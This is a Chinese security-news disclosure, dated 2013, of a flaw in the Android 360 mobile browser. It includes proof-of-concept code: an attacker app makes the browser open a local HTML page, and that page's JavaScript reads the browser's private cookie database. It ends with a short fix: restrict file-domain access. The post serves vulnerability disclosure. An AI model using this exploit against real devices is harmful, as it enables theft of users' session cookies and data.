首页 > 安全 > 系统安全 >

360手机浏览器缺陷可导致用户敏感数据泄漏

2013-12-23

当一个攻击app(恶意或非恶意均可以) 向360浏览器发送请求要求打开一个本地页面时,此本地页面中的可以按照攻击app的要求获取360浏览器下的所有数据,包括cookie信息等,盗取过程无需root,盗取之后可以发送给远

当一个攻击app(恶意或非恶意均可以) 向360浏览器发送请求要求打开一个本地页面时,此本地页面中的可以按照攻击app的要求获取360浏览器下的所有数据,包括cookie信息等,盗取过程无需root,盗取之后可以发送给远程服务器!
Android平台360手机浏览器最新版
MD5: 5b252a142a450b34bd3253acb51882bd
2013年9月22日 17:00
copyFile(); //自定义函数,释放filehehe.html到sd卡上

String url = "file:///mnt/sdcard/filehehe.html";

Intent contIntent = new Intent();

contIntent.setAction("android.intent.action.VIEW");

contIntent.setData(Uri.parse(url));

Intent intent = new Intent();

intent.setClassName("com.qihoo.browser","com.qihoo.browser.BrowserActivity");

intent.setAction("android.intent.action.VIEW");

intent.setData(Uri.parse(url));

this.startActivity(intent);

其中获取关键信息的filehehe.html文件:
function getDatabase() { 

var request = false;

    if(window.XMLHttpRequest) {

        request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType('text/xml');

}

    }



    xmlhttp = request;



var prefix = "file:////data/data/com.qihoo.browser/databases";

var postfix = "/webviewCookiesChromium.db"; //取保存cookie的db

var path = prefix.concat(postfix);



    // 获取本地文件代码

    xmlhttp.open("GET", path, false);



    xmlhttp.send(null);

    var ret = xmlhttp.responseText;



return ret;

}

修复方案:
限制file域的访问
相关文章
最新文章
热点推荐